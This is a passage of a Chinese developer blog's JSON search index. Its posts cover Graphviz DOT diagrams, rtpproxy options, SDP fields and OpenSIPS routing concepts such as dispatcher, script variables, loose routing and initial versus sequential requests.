a-\u0026gt;c[color=green] a-\u0026gt;b[color=red] a-\u0026gt;c[color=green] b-\u0026gt;c[color=orange] b-\u0026gt;a[color=red] b-\u0026gt;c[color=orange] b-\u0026gt;a[color=red] b-\u0026gt;c[color=orange] b-\u0026gt;a[color=red] c-\u0026gt;a[color=green] c-\u0026gt;b[color=orange] c-\u0026gt;a[color=green] c-\u0026gt;b[color=orange] c-\u0026gt;a[color=green] c-\u0026gt;b[color=orange] } 二叉树 digraph { node [shape = record,height=.1]; t0 [label=\u0026#34;\u0026lt;l\u0026gt;|9|\u0026lt;r\u0026gt;\u0026#34;] t1 [label=\u0026#34;\u0026lt;l\u0026gt;|1|\u0026lt;r\u0026gt;\u0026#34;] t5 [label=\u0026#34;\u0026lt;l\u0026gt;|5|\u0026lt;r\u0026gt;\u0026#34;] t6 [label=\u0026#34;\u0026lt;l\u0026gt;|6|\u0026lt;r\u0026gt;\u0026#34;] t11 [label=\u0026#34;\u0026lt;l\u0026gt;|11|\u0026lt;r\u0026gt;\u0026#34;] t34 [label=\u0026#34;\u0026lt;l\u0026gt;|34|\u0026lt;r\u0026gt;\u0026#34;] t0:l-\u0026gt;t5 t0:r-\u0026gt;t11 t5:l-\u0026gt;t1 t5:r-\u0026gt;t6 t11:r-\u0026gt;t34 } 水平分层 相关的节点,可以使用rank属性,使其分布在相同的水平层次。\ndigraph{ nodesep=.3 ranksep=.8 node [shape=none] 应用层 -\u0026gt; 运输层 -\u0026gt; 网络层 -\u0026gt; 链路层; node [shape=box]; http;websocket;sip;ssh; tcp;udp; icmp;ip;igmp; arp;rarp; {rank=same;应用层;http;websocket;sip;ssh} {rank=same;运输层;tcp;udp} {rank=same;网络层;icmp;ip;igmp} {rank=same;链路层;arp;硬件接口;rarp} http-\u0026gt;tcp websocket-\u0026gt;tcp; sip-\u0026gt;tcp; sip-\u0026gt;udp; ssh-\u0026gt;tcp; tcp-\u0026gt;ip; udp-\u0026gt;ip; ip-\u0026gt;igmp; icmp-\u0026gt;ip; ip-\u0026gt;硬件接口; arp-\u0026gt;硬件接口; 硬件接口-\u0026gt;rarp; } 最后挑战,画个小人 digraph easy{ nodesep = 0.5 header [shape=circle, label=\u0026#34;^_^\u0026#34;, style=filled, fillcolor=pink] body [shape=invhouse, label=\u0026#34;~ ~\\n~ ~\\n~ ~\u0026#34;, center=true, style=filled, fillcolor=peru] leftHand [shape=Mcircle, label=\u0026#34;\u0026#34;, style=filled, fillcolor=palegoldenrod] rightHand [shape=Mcircle, label=\u0026#34;\u0026#34;, style=filled, fillcolor=palegoldenrod] leftFoot [shape=egg, label=\u0026#34;\u0026#34;, style=filled, fillcolor=palegoldenrod] rightFoot [shape=egg, label=\u0026#34;\u0026#34;, style=filled, fillcolor=palegoldenrod] header-\u0026gt;body [arrowhead=crow]; body-\u0026gt;leftHand [arrowhead=invodot, penwidth=3, color=cornflowerblue, tailport=ne]; body-\u0026gt; rightHand [arrowhead=invodot, penwidth=3, color=cornflowerblue, tailport=nw]; body -\u0026gt; leftFoot [arrowhead=tee, penwidth=5, color=cornflowerblue] body -\u0026gt; rightFoot [arrowhead=tee, penwidth=5, color=cornflowerblue] } 还有那些颜色可以使用呢? 颜色预览:http://www.graphviz.org/doc/info/colors.html\n还有那些箭头的样式可以用呢? 我的图没预览出来,怎么办? 一般来说,如果图没有渲染出来,都是因为绘图语法出问题了。\n我刚刚开始用的时候,就常常把\u0026ndash;用在有向图中,导致图无法预览。建议官方可以把报错信息提示给用户。\n目前来说,这个错误信息只在控制台中打印了,需要按F12打开浏览器的console界面。看看哪里出错了,然后找到对应的位置修改。\n参考 https://graphviz.gitlab.io/_pages/pdf/dotguide.pdf https://casatwy.com/shi-yong-dotyu-yan-he-graphvizhui-tu-fan-yi.html 附件 dotguide.pdf\n","permalink":"https://wdd.js.org/posts/2019/06/","summary":"语雀官方的Graphviz感觉太复杂,我还是写一个简单一点的吧。\n两个圆一条线 注意\ngraph是用来标记无向图,里面只能用\u0026ndash;,不能用-\u0026gt;,否则无法显然出图片 digraph用来标记有向图,里面只用用-\u0026gt; 不能用\u0026ndash;, 否则无法显然出图片 graph easy { a -- b; } 连线加个备注 graph easy{ a--b [label=\u0026#34;你真漂亮\u0026#34;] } 你真漂亮,要大点,红色显眼点 graph easy{ a--b [label=\u0026#34;你真漂亮\u0026#34;, fontcolor=red, fontsize=34] } 两个圆,一个带有箭头的线 注意,这里用的digraph, 用来表示有向图\ndigraph easy { a -\u0026gt; b; } 如何画虚线呢? digraph easy { a -\u0026gt; b [style=dashed]; } 椭圆太单调了,有没有其他形状? shape\nbox 矩形 polygon ellipse circle 圆形 point egg 蛋形 triangle 三角形 plaintext 使用文字 diamond 钻石型 trapezium 梯形 parallelogram 斜的长方形 house hexagon octagon doublecircle doubleoctagon tripleoctagon invtriangle invtrapezium invhouse Mdiamond Msquare Mcircle none record Mrecord graph easy { node [shape=box] a -- b; } 形状也可以直接给节点定义。","title":"Graphviz教程 你学废了吗?"},{"content":"rtppoxy能提供什么功能? VoIP NAT穿透 传输声音、视频等任何RTP流 播放预先设置的呼入放音 RTP包重新分片 包传输优化 VoIP VPN 穿透 实时流复制 rtpproxy一般和那些软件集成? opensips Kamailio Sippy B2BUA freeswitch reSIProcate B2BUA rtpporxy的工作原理 启动参数介绍 参数 功能说明 例子 -l ipv4监听的地址 -l 192.168.3.47 -6 ipv6监听的地址 -s 控制Socket, 通过这个socket来修改,创建或者删除rtp session -s udp:192.168.3.49:6890 -F 默认情况下,rtpproxy会警告用户以超级用户的身份运行rtpproxy并且不允许远程控制。使用-F可以关闭这个限制 -m 最小使用的端口号,默认35000 -m 20000 -M 最大使用的端口号,默认65000 -M 50000 -L 单个进程最多可以使用的文件描述符。rtpproxy要求每个session使用4个文件描述符。 -L 20000 -d 日志级别,可选DBUG, INFO, WARN, ERR and CRIT, 默认DBUG -d ERR -A 广播地址,用于rtpprxy在NAT防火墙内部时使用 -A 171.16.200.13 -f 让rtpproxy前台运行,在做rtpproxy容器化时,启动脚本必须带有-f,否则容器运行后会立即退出 -V 输出rtpproxy的版本 参考 https://www.rtpproxy.org/ https://www.rtpproxy.org/doc/master/user_manual.html https://github.com/sippy/rtpproxy ","permalink":"https://wdd.js.org/opensips/ch9/rtpproxy/","summary":"rtppoxy能提供什么功能? VoIP NAT穿透 传输声音、视频等任何RTP流 播放预先设置的呼入放音 RTP包重新分片 包传输优化 VoIP VPN 穿透 实时流复制 rtpproxy一般和那些软件集成? opensips Kamailio Sippy B2BUA freeswitch reSIProcate B2BUA rtpporxy的工作原理 启动参数介绍 参数 功能说明 例子 -l ipv4监听的地址 -l 192.168.3.47 -6 ipv6监听的地址 -s 控制Socket, 通过这个socket来修改,创建或者删除rtp session -s udp:192.168.3.49:6890 -F 默认情况下,rtpproxy会警告用户以超级用户的身份运行rtpproxy并且不允许远程控制。使用-F可以关闭这个限制 -m 最小使用的端口号,默认35000 -m 20000 -M 最大使用的端口号,默认65000 -M 50000 -L 单个进程最多可以使用的文件描述符。rtpproxy要求每个session使用4个文件描述符。 -L 20000 -d 日志级别,可选DBUG, INFO, WARN, ERR and CRIT, 默认DBUG -d ERR -A 广播地址,用于rtpprxy在NAT防火墙内部时使用 -A 171.16.200.13 -f 让rtpproxy前台运行,在做rtpproxy容器化时,启动脚本必须带有-f,否则容器运行后会立即退出 -V 输出rtpproxy的版本 参考 https://www.rtpproxy.org/ https://www.","title":"rtpproxy学习"},{"content":"sdp栗子 v=0 o=- 7158718066157017333 2 IN IP4 127.0.0.1 s=- t=0 0 a=group:BUNDLE 0 a=msid-semantic: WMS byn72RFJBCUzdSPhnaBU4vSz7LFwfwNaF2Sy m=audio 64030 UDP/TLS/RTP/SAVPF 111 103 104 9 0 8 106 105 13 110 112 113 126 c=IN IP4 192.168.2.180 Session描述 **\nv= (protocol version number, currently only 0) o= (originator and session identifier : username, id, version number, network address) s= (session name : mandatory with at least one UTF-8-encoded character) i=* (session title or short information) u=* (URI of description) e=* (zero or more email address with optional name of contacts) p=* (zero or more phone number with optional name of contacts) c=* (connection information—not required if included in all media) b=* (zero or more bandwidth information lines) One or more Time descriptions (\u0026#34;t=\u0026#34; and \u0026#34;r=\u0026#34; lines; see below) z=* (time zone adjustments) k=* (encryption key) a=* (zero or more session attribute lines) Zero or more Media descriptions (each one starting by an \u0026#34;m=\u0026#34; line; see below) 时间描述(必须) t= (time the session is active) r=* (zero or more repeat times) 媒体描述(可选) m= (media name and transport address) i=* (media title or information field) c=* (connection information — optional if included at session level) b=* (zero or more bandwidth information lines) k=* (encryption key) a=* (zero or more media attribute lines — overriding the Session attribute lines) ","permalink":"https://wdd.js.org/opensips/ch9/sdp/","summary":"sdp栗子 v=0 o=- 7158718066157017333 2 IN IP4 127.0.0.1 s=- t=0 0 a=group:BUNDLE 0 a=msid-semantic: WMS byn72RFJBCUzdSPhnaBU4vSz7LFwfwNaF2Sy m=audio 64030 UDP/TLS/RTP/SAVPF 111 103 104 9 0 8 106 105 13 110 112 113 126 c=IN IP4 192.168.2.180 Session描述 **\nv= (protocol version number, currently only 0) o= (originator and session identifier : username, id, version number, network address) s= (session name : mandatory with at least one UTF-8-encoded character) i=* (session title or short information) u=* (URI of description) e=* (zero or more email address with optional name of contacts) p=* (zero or more phone number with optional name of contacts) c=* (connection information—not required if included in all media) b=* (zero or more bandwidth information lines) One or more Time descriptions (\u0026#34;t=\u0026#34; and \u0026#34;r=\u0026#34; lines; see below) z=* (time zone adjustments) k=* (encryption key) a=* (zero or more session attribute lines) Zero or more Media descriptions (each one starting by an \u0026#34;m=\u0026#34; line; see below) 时间描述(必须) t= (time the session is active) r=* (zero or more repeat times) 媒体描述(可选) m= (media name and transport address) i=* (media title or information field) c=* (connection information — optional if included at session level) b=* (zero or more bandwidth information lines) k=* (encryption key) a=* (zero or more media attribute lines — overriding the Session attribute lines) ","title":"sdp协议简介"},{"content":" Building Telephony Systems with OpenSIPS Second Edition SIP: Session Initiation Protocol Session Initiation Protocol (SIP) Basic Call Flow Examples Re-INVITE and Target-Refresh Request Handling in the Session Initiation Protocol (SIP) SDP: Session Description Protocol freeswitch权威指南 SIP: Understanding the Session Initiation Protocol, Third Edition (Artech House Telecommunications) https://tools.ietf.org/html/rfc4028 Hacking VoIP: Protocols, Attacks, and Countermeasures ","permalink":"https://wdd.js.org/opensips/ch9/books/","summary":" Building Telephony Systems with OpenSIPS Second Edition SIP: Session Initiation Protocol Session Initiation Protocol (SIP) Basic Call Flow Examples Re-INVITE and Target-Refresh Request Handling in the Session Initiation Protocol (SIP) SDP: Session Description Protocol freeswitch权威指南 SIP: Understanding the Session Initiation Protocol, Third Edition (Artech House Telecommunications) https://tools.ietf.org/html/rfc4028 Hacking VoIP: Protocols, Attacks, and Countermeasures ","title":"参考资料与书籍"},{"content":" 操作 无状态 有状态 SIP forward forward() t_relay() SIP replying sl_send_reply() t_reply() Create transaction t_newtran() Match transcation t_check_trans() ","permalink":"https://wdd.js.org/opensips/ch5/stateful-stateless/","summary":" 操作 无状态 有状态 SIP forward forward() t_relay() SIP replying sl_send_reply() t_reply() Create transaction t_newtran() Match transcation t_check_trans() ","title":"有状态和无状态路由"},{"content":"松散路由是sip 2版本的新的路由方法。严格路由是老的路由方法。\n如何从sip消息中区分严格路由和松散路由 下图sip消息中Route字段中带有**lr, **则说明这是松散路由。\nREGISTER sip:127.0.0.1 SIP/2.0 Via: SIP/2.0/UDP 127.0.0.1:58979;rport;branch=z9hG4bKPjMRzNdeTKn9rHNDtyJuVoyrDb84.cPtL8 Route: \u0026lt;sip:127.0.0.1;lr\u0026gt; Max-Forwards: 70 From: \u0026#34;1001\u0026#34; \u0026lt;sip:1001@172.17.0.2\u0026gt;;tag=oqkOzbQYd9cx5vXFjUnB1WufgWUZZxtZ To: \u0026#34;1001\u0026#34; \u0026lt;sip:1001@172.17.0.2\u0026gt; 功能上的区别 严格路由,sip请求经过uas后,invite url每次都会被重写。\n松散路由,sip请求经过uas后,invite url不变。\n#1 invite INVITE sip:callee@domain.com SIP/2.0 Contact: sip:caller@u1.example.com #2 invite INVITE sip:callee@domain.com SIP/2.0 Contact: sip:caller@u1.example.com Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; #3 invite INVITE sip:callee@u2.domain.com SIP/2.0 Contact: sip:caller@u1.example.com Record-Route: \u0026lt;sip:p2.domain.com;lr\u0026gt; Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; #4 200 ok SIP/2.0 200 OK Contact: sip:callee@u2.domain.com Record-Route: \u0026lt;sip:p2.domain.com;lr\u0026gt; Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; #7 bye BYE sip:callee@u2.domain.com SIP/2.0 Route: \u0026lt;sip:p1.example.com;lr\u0026gt;,\u0026lt;sip:p2.domain.com;lr\u0026gt; #8 bye BYE sip:callee@u2.domain.com SIP/2.0 Route: \u0026lt;sip:p2.domain.com;lr\u0026gt; #9 bye BYE sip:callee@u2.domain.com SIP/2.0 Traversing a Strict-Routing Proxy ","permalink":"https://wdd.js.org/opensips/ch5/strict-loose-routing/","summary":"松散路由是sip 2版本的新的路由方法。严格路由是老的路由方法。\n如何从sip消息中区分严格路由和松散路由 下图sip消息中Route字段中带有**lr, **则说明这是松散路由。\nREGISTER sip:127.0.0.1 SIP/2.0 Via: SIP/2.0/UDP 127.0.0.1:58979;rport;branch=z9hG4bKPjMRzNdeTKn9rHNDtyJuVoyrDb84.cPtL8 Route: \u0026lt;sip:127.0.0.1;lr\u0026gt; Max-Forwards: 70 From: \u0026#34;1001\u0026#34; \u0026lt;sip:1001@172.17.0.2\u0026gt;;tag=oqkOzbQYd9cx5vXFjUnB1WufgWUZZxtZ To: \u0026#34;1001\u0026#34; \u0026lt;sip:1001@172.17.0.2\u0026gt; 功能上的区别 严格路由,sip请求经过uas后,invite url每次都会被重写。\n松散路由,sip请求经过uas后,invite url不变。\n#1 invite INVITE sip:callee@domain.com SIP/2.0 Contact: sip:caller@u1.example.com #2 invite INVITE sip:callee@domain.com SIP/2.0 Contact: sip:caller@u1.example.com Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; #3 invite INVITE sip:callee@u2.domain.com SIP/2.0 Contact: sip:caller@u1.example.com Record-Route: \u0026lt;sip:p2.domain.com;lr\u0026gt; Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; #4 200 ok SIP/2.0 200 OK Contact: sip:callee@u2.domain.com Record-Route: \u0026lt;sip:p2.domain.com;lr\u0026gt; Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; #7 bye BYE sip:callee@u2.domain.com SIP/2.0 Route: \u0026lt;sip:p1.","title":"严格路由和松散路由"},{"content":"dispatcher模块用来分发sip消息。\ndispatcher如何记录目的地状态 dispatcher会使用一张表。\n需要关注两个字段destionations, state。\ndestionations表示sip消息要发往的目的地 state表示对目的地的状态检测结果 0 可用 1 不可用 2 表示正在检测 opensips只会想可用的目的地转发sip消息\nid setid destionations state 1 1 sip:p1:5060 0 2 1 sip:p2:5060 1 3 1 sip:p2:5061 2 dispatcher如何检测目的地的状态 本地的opensips会周期性的向目的地发送options包,如果对方立即返回200ok, 就说明目的地可用。\n在达到一定阈值后,目的地一直无响应,则opensips将其设置为不可用状态,或者正在检测状态。如下图所示\n代码例子 ds_select_dst()函数会去选择可用的目的地,并且设置当前sip消息的转发地址。如果发现无用可转发地址,则进入504 服务不可用的逻辑。\n如果sip终端注册时返回504,则可以从dispatcher模块,排查看看是不是所有的目的地都处于不可用状态。\nif (!ds_select_dst(\u0026#34;1\u0026#34;, \u0026#34;0\u0026#34;)) { send_reply(\u0026#34;504\u0026#34;,\u0026#34;Service Unavailable\u0026#34;); exit; } ","permalink":"https://wdd.js.org/opensips/ch6/dispatcher/","summary":"dispatcher模块用来分发sip消息。\ndispatcher如何记录目的地状态 dispatcher会使用一张表。\n需要关注两个字段destionations, state。\ndestionations表示sip消息要发往的目的地 state表示对目的地的状态检测结果 0 可用 1 不可用 2 表示正在检测 opensips只会想可用的目的地转发sip消息\nid setid destionations state 1 1 sip:p1:5060 0 2 1 sip:p2:5060 1 3 1 sip:p2:5061 2 dispatcher如何检测目的地的状态 本地的opensips会周期性的向目的地发送options包,如果对方立即返回200ok, 就说明目的地可用。\n在达到一定阈值后,目的地一直无响应,则opensips将其设置为不可用状态,或者正在检测状态。如下图所示\n代码例子 ds_select_dst()函数会去选择可用的目的地,并且设置当前sip消息的转发地址。如果发现无用可转发地址,则进入504 服务不可用的逻辑。\n如果sip终端注册时返回504,则可以从dispatcher模块,排查看看是不是所有的目的地都处于不可用状态。\nif (!ds_select_dst(\u0026#34;1\u0026#34;, \u0026#34;0\u0026#34;)) { send_reply(\u0026#34;504\u0026#34;,\u0026#34;Service Unavailable\u0026#34;); exit; } ","title":"sip消息分发之dispatcher模块"},{"content":"变量的使用方式 $(\u0026lt;context\u0026gt;type(name)[index]{transformation}) 变量都以$符号开头 type表示变量的类型:核心变量,自定义变量,键值对变量 name表示变量名:如$var(name), $avp(age) index表示需要,有些变量类似于数组,可以使用需要来指定。需要可以用正数和负数,如-1表示最后一个元素 transformations表示类型转换,如获取一个字符串值的长度,大小写转换等操作 context表示变量存在的作用域,opensips有请求的作用域和响应的作用域 # by type $ru # type type and name $hdr(Contact) # bye type and index $(ct[0]) # by type name and index $(avp(gw_ip)[2]) # by context $(\u0026lt;request\u0026gt;ru) $(\u0026lt;reply\u0026gt;hdr(Contact)) 引用变量 所有的引用变量都是可读的,但是只有部分变量可以修改。引用变量一般都是英文含义的首字母缩写,刚开始接触opensips的同学可能很不习惯。实际上通过首字母大概是可以猜出变量的含义的。\n必须记住变量的用黄色标记。\n变量名 英文含义 中文解释 是否可修改 $ru request url 请求url 是 $rU Username in SIP Request\u0026rsquo;s URI 是 $ci call id callId $hdr(from) request headers from 请求头中的from字段 是 $Ts current time unix Timestamp 当前时间的unix时间戳 $branch Branch $cl Content-Length $cs CSeq number $cT Content-Type $dd Domain of destination URI 目标地址的域名 是 $di Diversion header URI $dp Port of destination URI 目标地址的端口 是 $dP Transport protocol of destination URI 传输协议 $du Destination URI 目标地址 是 $fd From URI domain $fn From display name $ft From tag $fu From URI $fU From URI username $mb SIP message buffer $mf Message Flags $mi SIP message ID $ml SIP message length $od Domain in SIP Request\u0026rsquo;s original URI $op Port of SIP request\u0026rsquo;s original URI $oP Transport protocol of SIP request original URI $ou SIP Request\u0026rsquo;s original URI $oU Username in SIP Request\u0026rsquo;s original URI $param(idx) Route parameter $pp Process id $rd Domain in SIP Request\u0026rsquo;s URI $rb Body of request/reply 是 $rc Returned code $re Remote-Party-ID header URI $rm SIP request\u0026rsquo;s method $rp SIP request\u0026rsquo;s port 是 $rP Transport protocol of SIP request URI $rr SIP reply\u0026rsquo;s reason $rs SIP reply\u0026rsquo;s status $rt reference to URI of refer-to header $Ri Received IP address $Rp Received port $sf Script flags $si IP source address $sp Source port $td To URI Domain $tn To display name $tt To tag $tu To URI $tU To URI Username $TF String formatted time $TS Startup unix time stamp $ua User agent header 更多变量可以参考:https://www.opensips.org/Documentation/Script-CoreVar-2-4\n键值对变量 键值对变量是按需创建的 键值对只能用于有状态的路由处理中 键值对会绑定到指定的消息或者事务上 键值对初始化时是空值 键值对可以在所有的路由中读写 在响应路由中使用键值对,需要加载tm模块,并且设置onreply_avp_ mode参数 键值对可以读写,也可以删除 可以把键值对理解为key为hash, 值为堆栈的数据结构 $avp(my_name) = \u0026#34;wang\u0026#34; $avp(my_name) = \u0026#34;duan\u0026#34; xlog(\u0026#34;$avp(my_name)\u0026#34;) # duan xlog(\u0026#34;$avp(my_name)[0]\u0026#34;) # wang xlog(\u0026#34;$avp(my_name)[*]\u0026#34;) # wang duanduan 脚本变量 脚本变量只存在于当前主路由及其子路由中。路由结束,脚本变量将回收。 脚本变量需要指定初始化值,否则变量的值将不确定。 脚本变量只能有一个值 脚本变量读取要比键值对变量快,脚本变量直接引用内存的位置 如果需要变量,可以优先考虑使用脚本变量 $var(my_name) = \u0026#34;wangduanduan\u0026#34; $var(log_msg) = $var(my_name) + $ci + $fu xlog(\u0026#34;$var(log_msg)\u0026#34;) 脚本翻译 脚本翻译可以理解为一种工具函数,可以用来获取字符串长度,获取字符串的子字符等等操作。\n获取字符串长度 $(fu{s.len}) 字符串截取子串 $(var(x){s.substr,5,2}) 获取字符串的某部分 $(avp(my_uri){uri.user}) 将字符串值转为整数 $(var(x){s.int}) 翻译也可以链式调用 $(hdr(Test){s.escape.common}{s.len}) ","permalink":"https://wdd.js.org/opensips/ch5/var/","summary":"变量的使用方式 $(\u0026lt;context\u0026gt;type(name)[index]{transformation}) 变量都以$符号开头 type表示变量的类型:核心变量,自定义变量,键值对变量 name表示变量名:如$var(name), $avp(age) index表示需要,有些变量类似于数组,可以使用需要来指定。需要可以用正数和负数,如-1表示最后一个元素 transformations表示类型转换,如获取一个字符串值的长度,大小写转换等操作 context表示变量存在的作用域,opensips有请求的作用域和响应的作用域 # by type $ru # type type and name $hdr(Contact) # bye type and index $(ct[0]) # by type name and index $(avp(gw_ip)[2]) # by context $(\u0026lt;request\u0026gt;ru) $(\u0026lt;reply\u0026gt;hdr(Contact)) 引用变量 所有的引用变量都是可读的,但是只有部分变量可以修改。引用变量一般都是英文含义的首字母缩写,刚开始接触opensips的同学可能很不习惯。实际上通过首字母大概是可以猜出变量的含义的。\n必须记住变量的用黄色标记。\n变量名 英文含义 中文解释 是否可修改 $ru request url 请求url 是 $rU Username in SIP Request\u0026rsquo;s URI 是 $ci call id callId $hdr(from) request headers from 请求头中的from字段 是 $Ts current time unix Timestamp 当前时间的unix时间戳 $branch Branch $cl Content-Length $cs CSeq number $cT Content-Type $dd Domain of destination URI 目标地址的域名 是 $di Diversion header URI $dp Port of destination URI 目标地址的端口 是 $dP Transport protocol of destination URI 传输协议 $du Destination URI 目标地址 是 $fd From URI domain $fn From display name $ft From tag $fu From URI $fU From URI username $mb SIP message buffer $mf Message Flags $mi SIP message ID $ml SIP message length $od Domain in SIP Request\u0026rsquo;s original URI $op Port of SIP request\u0026rsquo;s original URI $oP Transport protocol of SIP request original URI $ou SIP Request\u0026rsquo;s original URI $oU Username in SIP Request\u0026rsquo;s original URI $param(idx) Route parameter $pp Process id $rd Domain in SIP Request\u0026rsquo;s URI $rb Body of request/reply 是 $rc Returned code $re Remote-Party-ID header URI $rm SIP request\u0026rsquo;s method $rp SIP request\u0026rsquo;s port 是 $rP Transport protocol of SIP request URI $rr SIP reply\u0026rsquo;s reason $rs SIP reply\u0026rsquo;s status $rt reference to URI of refer-to header $Ri Received IP address $Rp Received port $sf Script flags $si IP source address $sp Source port $td To URI Domain $tn To display name $tt To tag $tu To URI $tU To URI Username $TF String formatted time $TS Startup unix time stamp $ua User agent header 更多变量可以参考:https://www.","title":"变量的使用"},{"content":" 掌握路由触发时机的关键是以下几点\n消息是请求还是响应 消息是进入opensips的(incoming),还是离开opensips的(outgoing) 从opensips发出去的ack请求,不会触发任何路由 **进入opensips(**incoming) 离开opensips(outgoing) 请求 触发请求路由:例如invite, register, ack 触发分支路由。如invite的转发 响应 触发响应路由。如果是大于等于300的响应,还会触发失败路由。 不会触发任何路由 ","permalink":"https://wdd.js.org/opensips/ch5/triger-time/","summary":" 掌握路由触发时机的关键是以下几点\n消息是请求还是响应 消息是进入opensips的(incoming),还是离开opensips的(outgoing) 从opensips发出去的ack请求,不会触发任何路由 **进入opensips(**incoming) 离开opensips(outgoing) 请求 触发请求路由:例如invite, register, ack 触发分支路由。如invite的转发 响应 触发响应路由。如果是大于等于300的响应,还会触发失败路由。 不会触发任何路由 ","title":"路由的触发时机"},{"content":"在说这两种路由前,先说一个故事。蚂蚁找食物。\n蚁群里有一种蚂蚁负责搜寻食物叫做侦察兵,侦察兵得到消息,不远处可能有食物。于是侦察兵开始搜索食物的位置,并沿途留下自己的气味。翻过几座山之后,侦察兵发现了食物。然后又沿着气味回到了部落。然后通知搬运兵,沿着自己留下的气味,就可以找到食物。\n在上面的故事中,侦查兵可以看成是初始化请求,搬运并可以看做是序列化请求。在学习opensips的路由过程中,能够区分初始化请求和序列化请求,是非常重要的。\n一般路由处理,查数据库,查dns等都在初始化请求中做处理,序列化请求只需要简单的更具sip route字段去路由就可以了。\n类型 功能 message 如何区分 特点 初始化请求 创建session或者dialog invite has_totag()是false 1. 发现被叫:初始化请求经过不同的服务器,DNS服务器,前缀路由等各种复杂的路由方法,找到被叫2. **记录路径: **记录到达被叫的路径,给后续的序列请求提供导航 序列化请求 修改或者终止session ack, bye, re-ivite, notify has_totag()是true 1. 只需要根据初始化请求提供的导航路径,来到达路径,不需要复杂的路由逻辑。 区分初始化请求和序列化请求,是用header字段中的to字段是否含有tag标签。\ntag参数被用于to和from字段。使用callid,fromtag和totag三个字段可以来唯一识别一个dialog。每个tag来自一个ua。\n当一个ua发出一个不在对话中的请求时,fromtag提供一半的对话标识,当对话完成时,另一方参与者提供totag标识。\n举例来说,对于一个invite请求,例如Alice-\u0026gt;Proxy\ninvite请求to字段无tag参数 当alice回ack请求时,已经含有了to tag。这就是一个序列化请求了。因为通过之前的200ok, alice已经知道到达bob的路径。 INVITE sip:bob@biloxi.example.com SIP/2.0 Via: SIP/2.0/TCP client.atlanta.example.com:5060;branch=z9hG4bK74b43 Max-Forwards: 70 Route: \u0026lt;sip:ss1.atlanta.example.com;lr\u0026gt; From: Alice \u0026lt;sip:alice@atlanta.example.com\u0026gt;;tag=9fxced76sl # 有from tag To: Bob \u0026lt;sip:bob@biloxi.example.com\u0026gt; # 无to tag Call-ID: 3848276298220188511@atlanta.example.com CSeq: 1 INVITE Contact: \u0026lt;sip:alice@client.atlanta.example.com;transport=tcp\u0026gt; Content-Type: application/sdp Content-Length: 151 ACK sip:bob@client.biloxi.example.com SIP/2.0 Via: SIP/2.0/TCP client.atlanta.example.com:5060;branch=z9hG4bK74b76 Max-Forwards: 70 Route: \u0026lt;sip:ss1.atlanta.example.com;lr\u0026gt;, \u0026lt;sip:ss2.biloxi.example.com;lr\u0026gt; From: Alice \u0026lt;sip:alice@atlanta.example.com\u0026gt;;tag=9fxced76sl To: Bob \u0026lt;sip:bob@biloxi.example.com\u0026gt;;tag=314159 Call-ID: 3848276298220188511@atlanta.example.com CSeq: 2 ACK Content-Length: 0 注意,一定要明确一个消息,到底是请求还是响应。我们说初始化请求和序列化请求,说的都是请求,而不是响应。\n有些响应效应,例如代理返回的407响应,也会带有to tag。\nSIP/2.0 407 Proxy Authorization Required Via: SIP/2.0/TCP client.atlanta.example.com:5060;branch=z9hG4bK74b43 ;received=192.0.2.101 From: Alice \u0026lt;sip:alice@atlanta.example.com\u0026gt;;tag=9fxced76sl To: Bob \u0026lt;sip:bob@biloxi.example.com\u0026gt;;tag=3flal12sf Call-ID: 3848276298220188511@atlanta.example.com CSeq: 1 INVITE Proxy-Authenticate: Digest realm=\u0026#34;atlanta.example.com\u0026#34;, qop=\u0026#34;auth\u0026#34;, nonce=\u0026#34;f84f1cec41e6cbe5aea9c8e88d359\u0026#34;, opaque=\u0026#34;\u0026#34;, stale=FALSE, algorithm=MD5 Content-Length: 0 下图初始化请求\n下图序列化请求\n路由脚本中,初始化请求都是许多下很多功夫去考虑如何处理的。而对于序列化请求的处理则要简单的多。\n","permalink":"https://wdd.js.org/opensips/ch5/init-seque/","summary":"在说这两种路由前,先说一个故事。蚂蚁找食物。\n蚁群里有一种蚂蚁负责搜寻食物叫做侦察兵,侦察兵得到消息,不远处可能有食物。于是侦察兵开始搜索食物的位置,并沿途留下自己的气味。翻过几座山之后,侦察兵发现了食物。然后又沿着气味回到了部落。然后通知搬运兵,沿着自己留下的气味,就可以找到食物。\n在上面的故事中,侦查兵可以看成是初始化请求,搬运并可以看做是序列化请求。在学习opensips的路由过程中,能够区分初始化请求和序列化请求,是非常重要的。\n一般路由处理,查数据库,查dns等都在初始化请求中做处理,序列化请求只需要简单的更具sip route字段去路由就可以了。\n类型 功能 message 如何区分 特点 初始化请求 创建session或者dialog invite has_totag()是false 1. 发现被叫:初始化请求经过不同的服务器,DNS服务器,前缀路由等各种复杂的路由方法,找到被叫2. **记录路径: **记录到达被叫的路径,给后续的序列请求提供导航 序列化请求 修改或者终止session ack, bye, re-ivite, notify has_totag()是true 1. 只需要根据初始化请求提供的导航路径,来到达路径,不需要复杂的路由逻辑。 区分初始化请求和序列化请求,是用header字段中的to字段是否含有tag标签。\ntag参数被用于to和from字段。使用callid,fromtag和totag三个字段可以来唯一识别一个dialog。每个tag来自一个ua。\n当一个ua发出一个不在对话中的请求时,fromtag提供一半的对话标识,当对话完成时,另一方参与者提供totag标识。\n举例来说,对于一个invite请求,例如Alice-\u0026gt;Proxy\ninvite请求to字段无tag参数 当alice回ack请求时,已经含有了to tag。这就是一个序列化请求了。因为通过之前的200ok, alice已经知道到达bob的路径。 INVITE sip:bob@biloxi.example.com SIP/2.0 Via: SIP/2.0/TCP client.atlanta.example.com:5060;branch=z9hG4bK74b43 Max-Forwards: 70 Route: \u0026lt;sip:ss1.atlanta.example.com;lr\u0026gt; From: Alice \u0026lt;sip:alice@atlanta.example.com\u0026gt;;tag=9fxced76sl # 有from tag To: Bob \u0026lt;sip:bob@biloxi.example.com\u0026gt; # 无to tag Call-ID: 3848276298220188511@atlanta.example.com CSeq: 1 INVITE Contact: \u0026lt;sip:alice@client.atlanta.example.com;transport=tcp\u0026gt; Content-Type: application/sdp Content-Length: 151 ACK sip:bob@client.biloxi.example.com SIP/2.","title":"【重点】初始化请求和序列化请求"},{"content":"当你的代码一个屏幕无法展示完时,你就需要考虑模块化的事情了。\n维护一个上千行的代码,是很辛苦,也是很恐怖的事情。\n我们应当把自己的关注点放在某个具体的点上。\n方法1 